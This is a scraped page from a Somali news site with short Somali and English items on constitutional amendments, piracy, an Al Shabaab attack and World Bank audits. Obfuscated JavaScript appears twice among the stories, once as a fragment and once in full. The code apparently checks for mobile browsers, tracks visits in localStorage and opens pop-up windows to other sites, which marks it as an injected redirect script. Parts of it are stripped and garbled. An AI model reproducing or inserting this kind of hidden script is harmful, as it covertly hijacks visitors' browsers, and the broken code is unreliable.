Baarlamaanka Soomaaliya oo ansixiyay wax ka beddelka dastuurka dalka + Sawirro
MUQDISHO (SMN) - Xildhibaanada labada Aqal ee Baarlamaanka Soomaaliya ayaa ansixiyey cutubyo kamid ah Dastuurka KMG ah ee Dalka.
254 mudane oo ka tirsan labada gole ee Baarlamaanka ayaa u codeeyay ansixinta cutubyo kamid ah Dastuurka, mana jirin cid diiday.
Guddoomiyaha Golaha Shacabka Sheekh Aadan Madoobe ayaa ku dhawaaqay natiijada ansixinta Dastuurka.
Halkan hoose ka daawo Sawirrada:
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let...
Indian Navy Says It Intercepted Hijacked Vessel Near Somalia
NEW DELHI — India's navy said Friday it intercepted a fishing vessel in the Arabian Sea after a suspected hijacking, its latest anti-piracy operation after a spate of regional attacks on shipping.
Two Indian vessels had approached the Iranian-flagged FV Al Kamar 786 around 165 kilometers (103 miles) southwest of the Yemeni island of Socotra, not far from the eastern tip of Somalia.
An...
Six Kenyans killed in Somalia in suspected Al Shabaab attack
DHOBLEY, Somalia - Six Kenyans have been killed in Dhobley, Somalia by suspected Al Shabaab militants, Liboi Deputy County Commissioner Ali Manduku has confirmed.
Mr Manduku said the six are from the Meru region in Kenya and have been hawking plastic utensils in Dhobley Town.
"The bodies will be brought to Liboi this evening for identification. They have been doing business in...
Somalia submits vital audit report, averting the World Bank’s funding threat.
MOGADISHU, Somalia - Ahmed Gutale, the Auditor General of Somalia announced the submission of critical audit reports for World Bank-funded projects, potentially averting a financial crisis.
The submission came just one day after a leaked World Bank letter to Somalia's finance ministry hinted at possible cuts, citing delays in receiving critical financial papers.
Gutale shared his happiness on X, formerly known...
Fahad Yaasiin oo ka digay meel-marinta wax ka badalka Dastuurka
?????-????? ?????
Waxaan la wadaagayaa dhamaan umadda Soomaaliyeed hadal taariikhi ah oo xiriir la leh mustaqbalka dalka, waana shirqoolkii ugu halista badnaa oo la fulinayo iyadoo la adeegsanayo maskaxda iyo gacmaha masuuliyiin haya xilal qaran. Dowladda Imaaraadka Carabta oo dhawr jeer isku dayday qorshahan ayaa heshay fursad dahabi ah, waana in dalka Soomaaliya la galiyo qalalaase iyo burbur uusan ka...
DF oo gudbisay warbixinta mashaariicda uu maalgeliyo Bangiga Adduunka
MUQDISHO (SMN) - Xafiiska Hantidhowrka Guud ee JFS ayaa gudbiyey warbixinada Hantidhawrka ee mashaariicda uu maalgeliyo Bangiga Adduunka ee Dowladda Federaalka Soomaaliya.
Warbixinada Hantidhowrka ee mashaariicda ayaa Xafiiska Hantidhowrku gudbiyey ka hor inta aan la gaarin waqtiga loo asteeyay.
Tallaabadan ayaa dhiirigelineysa daah-furnaanta iyo isla xisaabtanka, siineysana hubanti saaxiibbada horumarka Soomaaliya ka taageera iyo joogteynta mashaariicda horumarineed ee JFS.
Halkan hoose ka...
BF Soomaaliya oo maanta wax ka beddelaya nuqulo ka mid ah Dastuurka
MUQDISHO (SMN) - Xildhibaanada labada aqal ee Baarlamaanka Soomaaliya ayaa la filayaa in maanta kulan wadajir ah ay ku yeeshaan xarunta Villa Hargeysa ee magaalada Muqdisho.
Kulankan oo ah mid xasaasi ah ayaa qorshuhu yahay in cod loogu qaado, qodobbo ka mid ah dastuurka kumeel gaarka ah ee Soomaaliya.
Xildhibaanada ayaa maalmihii lasoo dhaafay ka doodayay afarta cutub ee ugu horreyso...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Farmaajo & Shariif oo digniin kasoo saaray qorshaha Villa Soomaaliya
MUQDISHO (SMN) - Madaxweynayaashii hore ee dalka Maxamed Cabdullaahi Farmaajo iyo Sheekh Sharfiif Sheekh Axmed oo si wadajir ah usoo saaray warsaxaafadeed ayaa ka digay qorshaha Villa Soomaaliya ee ku aadan wax ka beddelka dastuurka oo lagu wado in beri uu go'aan ka gaaro baarlamaanka Soomaaliyeed.
Farmaajo iyo Shariif ayaa ku eedeeyay madaxweyne Xasan Sheekh keligii talisimo iyo inuu ka...
Maraakiibta mara badda Soomaaliya oo sameystay Ciidamo ilaaliya
MUQDISHO (SMN) - Qiimaha ilaalada gaarka ah ee markabka maraya xeebaha dalka Soomaaliya ayaa kor u kacay sanadkan, kadib markii ay dib usoo rogaal-celiyeen kooxaha burcad-badeeda oo billaabay afduubka maraakiibta ganacsiga.
Kadib markii uu khalkhal galay amniga Badda Cas oo Xuutiyiinta ay weerarka ka geysanayaan, ayaa maraakiibta waxay galeen khatar kale oo uga imaanaysa budhcad-badeedda ee ka soo cusboonaadey Soomaaliya.
Baahida...












